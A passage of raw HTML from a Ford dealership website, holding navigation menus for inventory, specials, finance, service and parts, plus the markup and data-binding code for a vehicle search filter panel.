tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Cash Vehicles</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/inventory/used-cars-under-10k/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Vehicles Under $10,000</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/inventory/used-specials/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Used Specials</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/choose-specialist/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Choose Your Product Specialist</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/ford-certified-program/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Ford Certified Benefits</span></a></div></div><div class="site-menu_scrollable sc-MYvYT QqKeG sc-gQNndl jNxOgc" data-jzlbind-class="'site-menu_scrollable sc-MYvYT QqKeG ' + (h('nav_menu__1.firstLevelSelectedId') == 2195 ? 'active' : '')"><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/new-ford-specials-north-richland-hills-tx" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Lease and Finance Specials</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/inventory/new-inventory-specials/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Demo and Loaner Specials</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/inventory/used-specials/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Used Specials</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/service-specials/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Service Specials</span></a></div></div><div class="site-menu_scrollable sc-MYvYT QqKeG sc-gQNndl jNxOgc" data-jzlbind-class="'site-menu_scrollable sc-MYvYT QqKeG ' + (h('nav_menu__1.firstLevelSelectedId') == 2202 ? 'active' : '')"><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/finance-application/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Apply Online</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/finance-itin/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">En Espanol</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/finance-first-time-buyer/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">First Time Buyer</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/finance-credit-restart/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Credit Restart</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/college-graduates-students/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">College Graduates &amp; Students</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/ford-vehicle-exchange-program-near-fort-worth-tx/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Vehicle Exchange Program</span></a></div></div><div class="site-menu_scrollable sc-MYvYT QqKeG sc-gQNndl jNxOgc" data-jzlbind-class="'site-menu_scrollable sc-MYvYT QqKeG ' + (h('nav_menu__1.firstLevelSelectedId') == 2284 ? 'active' : '')"><div class="sc-RmnOB eUKhpK"><a href="https://5starford.worktrucksolutions.com/?utm_source=retailsite&amp;#038;utm_medium=linkrec&amp;#038;utm_campaign=mainnav&amp;#038;utm_term=worktrucks" target="_blank" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">New Work Trucks</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/commercial-sales/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Commercial Department</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/used-commercial/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Used Commercial</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/community-network/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Credit Unions</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/commercial-repair/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Commercial Repair</span></a></div></div><div class="site-menu_scrollable sc-MYvYT QqKeG sc-gQNndl jNxOgc" data-jzlbind-class="'site-menu_scrollable sc-MYvYT QqKeG ' + (h('nav_menu__1.firstLevelSelectedId') == 2216 ? 'active' : '')"><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/parts-center/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Parts Department</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://parts.ford.com/5star" target="_blank" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Order Parts</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/accessories/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Accessories</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/tire-finder/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Tire Finder</span></a></div><div class="sc-RmnOB eUKhpK"><a href="http://www.fordcollection.com/location/5Star" target="_blank" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Apparels &amp; Gifts</span></a></div></div><div class="site-menu_scrollable sc-MYvYT QqKeG sc-gQNndl jNxOgc" data-jzlbind-class="'site-menu_scrollable sc-MYvYT QqKeG ' + (h('nav_menu__1.firstLevelSelectedId') == 2209 ? 'active' : '')"><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/service-center/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Service Department</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/service-appointment/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Schedule Service</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/service-specials/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Coupons</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/sync/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Ford SYNC</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/askatech-question/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Ask a Tech</span></a></div></div><div class="site-menu_scrollable sc-MYvYT QqKeG sc-gQNndl jNxOgc" data-jzlbind-class="'site-menu_scrollable sc-MYvYT QqKeG ' + (h('nav_menu__1.firstLevelSelectedId') == 2294 ? 'active' : '')"><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/collision-center/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Collision Center</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/collision-estimate-form/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Collision Estimate Form</span></a></div></div><div class="site-menu_scrollable sc-MYvYT QqKeG sc-gQNndl jNxOgc" data-jzlbind-class="'site-menu_scrollable sc-MYvYT QqKeG ' + (h('nav_menu__1.firstLevelSelectedId') == 2221 ? 'active' : '')"><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/about-us/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">About Us</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/our-team/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Staff</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/hours-directions/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Hours/Directions</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/contact-us/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Contact Us</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/awards/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Awards</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/triple-crown-meaning/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Triple Crown</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/community-network/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Community Network</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/video-gallery/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Ford Video Gallery</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://sites.hireology.com/sampackautogroup" target="_blank" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Join Our Team</span></a></div></div><div class="sc-blIhvV OcxaF"><div class="sc-dlyikq frIulz active sc-bYTsla fLFyAJ" data-jzlbind-class="'sc-dlyikq frIulz ' + (h('nav_menu__1.firstLevelSelectedId') == 2154 ? 'active' : '')"><span role="button" tabindex="0" data-jzlbind-tap="jzlMergeState({'panels': { hasChanged:true },'nav_menu__1':{firstLevelSelectedId: 2154}})" class="sc-glUWqk fBTNKH"><span class="sc-fFTYTi dnSftX">New Ford</span><span data-jzlbind-class="h('nav_menu__1.firstLevelSelectedId') == 2154 ? 'arrow left' : 'arrow right'" class="sc-bTiqRo iYFFKG"><svg fill="rgb(255, 255, 255)" viewBox="0 0 48 48" width="20" height="48"><path d="M30.83 32.67l-9.17-9.17 9.17-9.17-2.83-2.83-12 12 12 12z"></path><path d="M0-.5h48v48h-48z" fill="none"></path></svg></span></span></div><div class="sc-dlyikq frIulz sc-bYTsla fLFyAJ" data-jzlbind-class="'sc-dlyikq frIulz ' + (h('nav_menu__1.firstLevelSelectedId') == 2187 ? 'active' : '')"><span role="button" tabindex="0" data-jzlbind-tap="jzlMergeState({'panels': { hasChanged:true },'nav_menu__1':{firstLevelSelectedId: 2187}})" class="sc-glUWqk fBTNKH"><span class="sc-fFTYTi dnSftX">Used Cars</span><span data-jzlbind-class="h('nav_menu__1.firstLevelSelectedId') == 2187 ? 'arrow left' : 'arrow right'" class="sc-bTiqRo iYFFKG"><svg fill="rgb(255, 255, 255)" viewBox="0 0 48 48" width="20" height="48"><path d="M30.83 32.67l-9.17-9.17 9.17-9.17-2.83-2.83-12 12 12 12z"></path><path d="M0-.5h48v48h-48z" fill="none"></path></svg></span></span></div><div class="sc-dlyikq frIulz sc-bYTsla fLFyAJ" data-jzlbind-class="'sc-dlyikq frIulz ' + (h('nav_menu__1.firstLevelSelectedId') == 2195 ? 'active' : '')"><span role="button" tabindex="0" data-jzlbind-tap="jzlMergeState({'panels': { hasChanged:true },'nav_menu__1':{firstLevelSelectedId: 2195}})" class="sc-glUWqk fBTNKH"><span class="sc-fFTYTi dnSftX">Specials</span><span data-jzlbind-class="h('nav_menu__1.firstLevelSelectedId') == 2195 ? 'arrow left' : 'arrow right'" class="sc-bTiqRo iYFFKG"><svg fill="rgb(255, 255, 255)" viewBox="0 0 48 48" width="20" height="48"><path d="M30.83 32.67l-9.17-9.17 9.17-9.17-2.83-2.83-12 12 12 12z"></path><path d="M0-.5h48v48h-48z" fill="none"></path></svg></span></span></div><div class="sc-dlyikq frIulz sc-bYTsla fLFyAJ" data-jzlbind-class="'sc-dlyikq frIulz ' + (h('nav_menu__1.firstLevelSelectedId') == 2202 ? 'active' : '')"><span role="button" tabindex="0" data-jzlbind-tap="jzlMergeState({'panels': { hasChanged:true },'nav_menu__1':{firstLevelSelectedId: 2202}})" class="sc-glUWqk fBTNKH"><span class="sc-fFTYTi dnSftX">Finance</span><span data-jzlbind-class="h('nav_menu__1.firstLevelSelectedId') == 2202 ? 'arrow left' : 'arrow right'" class="sc-bTiqRo iYFFKG"><svg fill="rgb(255, 255, 255)" viewBox="0 0 48 48" width="20" height="48"><path d="M30.83 32.67l-9.17-9.17 9.17-9.17-2.83-2.83-12 12 12 12z"></path><path d="M0-.5h48v48h-48z" fill="none"></path></svg></span></span></div><div class="sc-dlyikq frIulz sc-bYTsla fLFyAJ" data-jzlbind-class="'sc-dlyikq frIulz ' + (h('nav_menu__1.firstLevelSelectedId') == 2284 ? 'active' : '')"><span role="button" tabindex="0" data-jzlbind-tap="jzlMergeState({'panels': { hasChanged:true },'nav_menu__1':{firstLevelSelectedId: 2284}})" class="sc-glUWqk fBTNKH"><span class="sc-fFTYTi dnSftX">Work Trucks</span><span data-jzlbind-class="h('nav_menu__1.firstLevelSelectedId') == 2284 ? 'arrow left' : 'arrow right'" class="sc-bTiqRo iYFFKG"><svg fill="rgb(255, 255, 255)" viewBox="0 0 48 48" width="20" height="48"><path d="M30.83 32.67l-9.17-9.17 9.17-9.17-2.83-2.83-12 12 12 12z"></path><path d="M0-.5h48v48h-48z" fill="none"></path></svg></span></span></div><div class="sc-dlyikq frIulz sc-bYTsla fLFyAJ" data-jzlbind-class="'sc-dlyikq frIulz ' + (h('nav_menu__1.firstLevelSelectedId') == 2216 ? 'active' : '')"><span role="button" tabindex="0" data-jzlbind-tap="jzlMergeState({'panels': { hasChanged:true },'nav_menu__1':{firstLevelSelectedId: 2216}})" class="sc-glUWqk fBTNKH"><span class="sc-fFTYTi dnSftX">Parts</span><span data-jzlbind-class="h('nav_menu__1.firstLevelSelectedId') == 2216 ? 'arrow left' : 'arrow right'" class="sc-bTiqRo iYFFKG"><svg fill="rgb(255, 255, 255)" viewBox="0 0 48 48" width="20" height="48"><path d="M30.83 32.67l-9.17-9.17 9.17-9.17-2.83-2.83-12 12 12 12z"></path><path d="M0-.5h48v48h-48z" fill="none"></path></svg></span></span></div><div class="sc-dlyikq frIulz sc-bYTsla fLFyAJ" data-jzlbind-class="'sc-dlyikq frIulz ' + (h('nav_menu__1.firstLevelSelectedId') == 2209 ? 'active' : '')"><span role="button" tabindex="0" data-jzlbind-tap="jzlMergeState({'panels': { hasChanged:true },'nav_menu__1':{firstLevelSelectedId: 2209}})" class="sc-glUWqk fBTNKH"><span class="sc-fFTYTi dnSftX">Service</span><span data-jzlbind-class="h('nav_menu__1.firstLevelSelectedId') == 2209 ? 'arrow left' : 'arrow right'" class="sc-bTiqRo iYFFKG"><svg fill="rgb(255, 255, 255)" viewBox="0 0 48 48" width="20" height="48"><path d="M30.83 32.67l-9.17-9.17 9.17-9.17-2.83-2.83-12 12 12 12z"></path><path d="M0-.5h48v48h-48z" fill="none"></path></svg></span></span></div><div class="sc-dlyikq frIulz sc-bYTsla fLFyAJ" data-jzlbind-class="'sc-dlyikq frIulz ' + (h('nav_menu__1.firstLevelSelectedId') == 2294 ? 'active' : '')"><span role="button" tabindex="0" data-jzlbind-tap="jzlMergeState({'panels': { hasChanged:true },'nav_menu__1':{firstLevelSelectedId: 2294}})" class="sc-glUWqk fBTNKH"><span class="sc-fFTYTi dnSftX">Collision</span><span data-jzlbind-class="h('nav_menu__1.firstLevelSelectedId') == 2294 ? 'arrow left' : 'arrow right'" class="sc-bTiqRo iYFFKG"><svg fill="rgb(255, 255, 255)" viewBox="0 0 48 48" width="20" height="48"><path d="M30.83 32.67l-9.17-9.17 9.17-9.17-2.83-2.83-12 12 12 12z"></path><path d="M0-.5h48v48h-48z" fill="none"></path></svg></span></span></div><div class="sc-dlyikq frIulz sc-bYTsla fLFyAJ" data-jzlbind-class="'sc-dlyikq frIulz ' + (h('nav_menu__1.firstLevelSelectedId') == 2221 ? 'active' : '')"><span role="button" tabindex="0" data-jzlbind-tap="jzlMergeState({'panels': { hasChanged:true },'nav_menu__1':{firstLevelSelectedId: 2221}})" class="sc-glUWqk fBTNKH"><span class="sc-fFTYTi dnSftX">About</span><span data-jzlbind-class="h('nav_menu__1.firstLevelSelectedId') == 2221 ? 'arrow left' : 'arrow right'" class="sc-bTiqRo iYFFKG"><svg fill="rgb(255, 255, 255)" viewBox="0 0 48 48" width="20" height="48"><path d="M30.83 32.67l-9.17-9.17 9.17-9.17-2.83-2.83-12 12 12 12z"></path><path d="M0-.5h48v48h-48z" fill="none"></path></svg></span></span></div></div></div></div></div></div><div class="sc-esExBO cXirUR hidden hiddenRight sc-dWcDbm fMVLCo" data-jzlbind-class="'sc-esExBO cXirUR ' + ((h('bars.activeBars').map(function(x) { return x(); }).filter(function(x) { return x != null; }).join(' ')) + ' ' + ((h('panels.activePanel') == 'search-panel') ? '' : (true) ? 'hidden hiddenRight' : ''))"><div class="sc-csZoYU kfETSJ sc-ctwKVn bjLtsj" data-jzlbind-class="'sc-csZoYU kfETSJ ' + (h('panels.hasChanged') === true ? 'hasChanged' : '')" id="search-panel" color="searchPanelTextColor"><div class="sc-gYtlsd dyYfjy"><div class="sc-hqGPoI hFePYG"><div class="sc-imAxmJ fnosjm"><div class="sc-iWadT idlVaW"><form id="rocketux-search-event-node" target="_top" method="post" data-jzlbind-action-xhr="https://rocket-prod.jazelc.com:29620/rocket-nav-search-post-state" data-jzlbind-submit-success="jzlMergeState({ filtersState: { selectedFilters: event.response } })"><input type="hidden" name="filtersJson"><div class="submit-button" role="button" tabindex="0" data-jzlbind-tap="jzlBindElement('rocketux-search-event-node').submit()">Submit</div></form></div><div class="sc-gjAXCV kqIHnM collapsed sc-cSYcjD fVHGdp" data-jzlbind-class="'sc-gjAXCV kqIHnM ' + (h('filtersSearchState.expanded').map(function(x) { return x(); }).includes(&quot;conditions&quot;) ? 'expanded' : 'collapsed')"><div class="sc-dOkuiw eEMhT"><div role="button" tabindex="0" class="collapsed sc-jGFFOr jWyTtC" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').concat([&quot;conditions&quot;]) } })">Select <span>Condition <div class="type-filters sc-hAXbOi CBVH sc-gAmQfK iNYjOK" data-jzlbind-class="'type-filters sc-hAXbOi CBVH ' + ('')" hidden="" data-jzlbind-hidden=" ![&quot;conditions&quot;].some(x => { var v = h('filtersState.selectedFilters', x) || []; return v.length > 0; }) "><div class="material-icons undefined sc-cCVOAp hvVvzq">lens</div></div></span></div><div role="button" tabindex="0" class="expanded sc-jGFFOr jWyTtC" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').filter(function(x) { return x() != &quot;conditions&quot;; }) } })">Select <span>Condition <div class="type-filters sc-hAXbOi CBVH sc-gAmQfK iNYjOK" data-jzlbind-class="'type-filters sc-hAXbOi CBVH ' + ('')" hidden="" data-jzlbind-hidden=" ![&quot;conditions&quot;].some(x => { var v = h('filtersState.selectedFilters', x) || []; return v.length > 0; }) "><div class="material-icons undefined sc-cCVOAp hvVvzq">lens</div></div></span></div><div role="button" tabindex="0" class="collapsed sc-hZeNU jMXvnB" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').concat([&quot;conditions&quot;]) } })"><div class="material-icons pointer">expand_more</div></div><div role="button" tabindex="0" class="expanded sc-hZeNU jMXvnB" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').filter(function(x) { return x() != &quot;conditions&quot;; }) } })"><div class="material-icons pointer">expand_less</div></div></div><div class="sc-hMjcWo jrYwyq"><div class="sc-kMBllD EiSIn" data-jzlbind-list="h('filtersState.availableFilters.conditions.items')"><script type="x-tmpl-mustache"><div class="sc-hCbubC kiEKbJ sc-hgzKov WquWS" data-jzlbind-class="&#x27;sc-hCbubC kiEKbJ &#x27; + ( (h(&#x27;filtersState.selectedFilters.conditions&#x27;) || []) .some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? &#x27;selected&#x27; : &#x27;&#x27; )"><div class="sc-eAudoH kaFpHe buttonComponent plain sc-bLJvFH iJbpqW" data-jzlbind-class="&#x27;sc-eAudoH kaFpHe &#x27; + ( (h(&#x27;filtersState.selectedFilters.conditions&#x27;) || []).some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? &quot;buttonComponent checked &quot; : &quot;buttonComponent plain &quot; )" role="button" tabindex="0" data-jzlbind-tap=" jzlMergeState({ filtersState: { selectedFilters: { conditions: h(&#x27;filtersState.selectedFilters&#x27;) != null &amp;&amp; Object.keys(h(&#x27;filtersState.selectedFilters&#x27;)).includes(&#x27;conditions&#x27;) ? ( h(&#x27;filtersState.selectedFilters.conditions&#x27;).some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? h(&#x27;filtersState.selectedFilters.conditions&#x27;).filter(function(x) { return x() !== &#x27;{{value}}&#x27;; }) : h(&#x27;filtersState.selectedFilters.conditions&#x27;).concat([&#x27;{{value}}&#x27;]) ) : [&#x27;{{value}}&#x27;] } }, }) "><span>{{label}}</span></div></div></script></div></div></div><div class="sc-gjAXCV kqIHnM collapsed sc-cSYcjD fVHGdp" data-jzlbind-class="'sc-gjAXCV kqIHnM ' + (h('filtersSearchState.expanded').map(function(x) { return x(); }).includes(&quot;models&quot;) ? 'expanded' : 'collapsed')"><div class="sc-dOkuiw eEMhT"><div role="button" tabindex="0" class="collapsed sc-jGFFOr jWyTtC" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').concat([&quot;models&quot;]) } })">Select <span>Models <div class="type-filters sc-hAXbOi CBVH sc-gAmQfK iNYjOK" data-jzlbind-class="'type-filters sc-hAXbOi CBVH ' + ('')" hidden="" data-jzlbind-hidden=" ![&quot;models&quot;].some(x => { var v = h('filtersState.selectedFilters', x) || []; return v.length > 0; }) "><div class="material-icons undefined sc-cCVOAp hvVvzq">lens</div></div></span></div><div role="button" tabindex="0" class="expanded sc-jGFFOr jWyTtC" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').filter(function(x) { return x() != &quot;models&quot;; }) } })">Select <span>Models <div class="type-filters sc-hAXbOi CBVH sc-gAmQfK iNYjOK" data-jzlbind-class="'type-filters sc-hAXbOi CBVH ' + ('')" hidden="" data-jzlbind-hidden=" ![&quot;models&quot;].some(x => { var v = h('filtersState.selectedFilters', x) || []; return v.length > 0; }) "><div class="material-icons undefined sc-cCVOAp hvVvzq">lens</div></div></span></div><div role="button" tabindex="0" class="collapsed sc-hZeNU jMXvnB" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').concat([&quot;models&quot;]) } })"><div class="material-icons pointer">expand_more</div></div><div role="button" tabindex="0" class="expanded sc-hZeNU jMXvnB" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').filter(function(x) { return x() != &quot;models&quot;; }) } })"><div class="material-icons pointer">expand_less</div></div></div><div class="sc-hMjcWo jrYwyq"><div class="sc-enfXDO bcoKla"><div data-jzlbind-list="h('filtersState.selectedFilters.models')"><script type="x-tmpl-mustache"><div class="sc-jgVwMx jedwTc"><div class="sc-kWHCRG dcnznL"><div class="checked sc-eAudoH kaFpHe sc-bLJvFH iJbpqW" data-jzlbind-class="&#x27;checked sc-eAudoH kaFpHe &#x27; + (&#x27;&#x27;)" role="button" tabindex="0" data-jzlbind-tap=" jzlMergeState({ filtersState: { selectedFilters: { models: h(&#x27;filtersState.selectedFilters.models&#x27;) .map(function(x) { return x(); }) .filter(function (x, i) { return i !== {{$index}}; }) } }, }) "><span data-jzlbind-text="&quot;{{$item}}&quot;.split(&#x27;--&#x27;)[0]"></span></div></div><div class="sc-kWHCRG dcnznL"><div data-jzlbind-hidden=" &quot;{{$item}}&quot;.split(&#x27;--&#x27;).length &gt; 1 " class="sc-ijnzTp lmVZDR"><div class="sc-AUpyg cwYwqD"><select data-jzlbind-options=" [{ value: &quot;&quot;, label: &quot;Select Model&quot; }].concat( ( (hf(&#x27;filtersState.availableFilters.modelsByMake.items&#x27;) || []) .find(function(x) { return x.make === &quot;{{$item}}&quot;.split(&#x27;--&#x27;)[0]; }) || { items: [] } ) .items ) " data-jzlbind-change=" jzlMergeState({ filtersState: { selectedFilters: { models: h(&#x27;filtersState.selectedFilters.models&#x27;) .map( function(x, i) { return i === {{$index}} ? event.target.value : x(); }) } }, }) " class="sc-dBfaGr ljGlKU"></select></div></div><div class="checked sc-eAudoH kaFpHe sc-bLJvFH iJbpqW" data-jzlbind-class="&#x27;checked sc-eAudoH kaFpHe &#x27; + (&#x27;&#x27;)" role="button" tabindex="0" hidden="" data-jzlbind-hidden="&quot;{{$item}}&quot;.split(&#x27;--&#x27;).length &lt; 2" data-jzlbind-tap=" jzlMergeState({ filtersState: { selectedFilters: { models: h(&#x27;filtersState.selectedFilters.models&#x27;) .map(function(x, i) { return i === {{$index}} ? &quot;{{$item}}&quot;.split(&#x27;--&#x27;)[0] : x(); }) } }, }) "><span data-jzlbind-text="&quot;{{$item}}&quot;.split(&#x27;--&#x27;)[1]"></span></div></div></div></script></div><div><div class="sc-jgVwMx jedwTc"><div class="sc-kWHCRG dcnznL"><div class="sc-AUpyg cwYwqD"><select data-jzlbind-change=" jzlMergeState({ filtersState: { selectedFilters: { models: (h('filtersState.selectedFilters.models') || []).concat([event.target.value]) } }, }), (function() { event.target.value = &quot;&quot;; })() " data-jzlbind-options=" [{ value: &quot;&quot;, label: &quot;Select Make&quot; }].concat( (h('filtersState.availableFilters.makes.items') || []) .map(function(x) { return x(); }) .filter(function(x) { return x != null; }) ) " class="sc-dBfaGr ljGlKU"></select></div></div><div class="sc-kWHCRG dcnznL"><div class="sc-ijnzTp lmVZDR"><select disabled="" class="sc-dBfaGr ljGlKU"><option value="">Select Model</option></select></div></div></div></div></div></div></div><div class="sc-gjAXCV kqIHnM collapsed sc-cSYcjD fVHGdp" data-jzlbind-class="'sc-gjAXCV kqIHnM ' + (h('filtersSearchState.expanded').map(function(x) { return x(); }).includes(&quot;years&quot;) ? 'expanded' : 'collapsed')"><div class="sc-dOkuiw eEMhT"><div role="button" tabindex="0" class="collapsed sc-jGFFOr jWyTtC" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').concat([&quot;years&quot;]) } })"> <span>Years <div class="type-filters sc-hAXbOi CBVH sc-gAmQfK iNYjOK" data-jzlbind-class="'type-filters sc-hAXbOi CBVH ' + ('')" hidden="" data-jzlbind-hidden=" ![&quot;years&quot;].some(x => { var v = h('filtersState.selectedFilters', x) || []; return v.length > 0; }) "><div class="material-icons undefined sc-cCVOAp hvVvzq">lens</div></div></span></div><div role="button" tabindex="0" class="expanded sc-jGFFOr jWyTtC" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').filter(function(x) { return x() != &quot;years&quot;; }) } })"> <span>Years <div class="type-filters sc-hAXbOi CBVH sc-gAmQfK iNYjOK" data-jzlbind-class="'type-filters sc-hAXbOi CBVH ' + ('')" hidden="" data-jzlbind-hidden=" ![&quot;years&quot;].some(x => { var v = h('filtersState.selectedFilters', x) || []; return v.length > 0; }) "><div class="material-icons undefined sc-cCVOAp hvVvzq">lens</div></div></span></div><div role="button" tabindex="0" class="collapsed sc-hZeNU jMXvnB" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').concat([&quot;years&quot;]) } })"><div class="material-icons pointer">expand_more</div></div><div role="button" tabindex="0" class="expanded sc-hZeNU jMXvnB" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').filter(function(x) { return x() != &quot;years&quot;; }) } })"><div class="material-icons pointer">expand_less</div></div></div><div class="sc-hMjcWo jrYwyq"><div class="sc-kMBllD uUDKz" data-jzlbind-list="h('filtersState.availableFilters.years.items')"><script type="x-tmpl-mustache"><div class="sc-hCbubC kiEKbJ sc-hgzKov WquWS" data-jzlbind-class="&#x27;sc-hCbubC kiEKbJ &#x27; + ( (h(&#x27;filtersState.selectedFilters.years&#x27;) || []).some(function(x) { return x() === &#x27;{{value}}&#x27;; }) 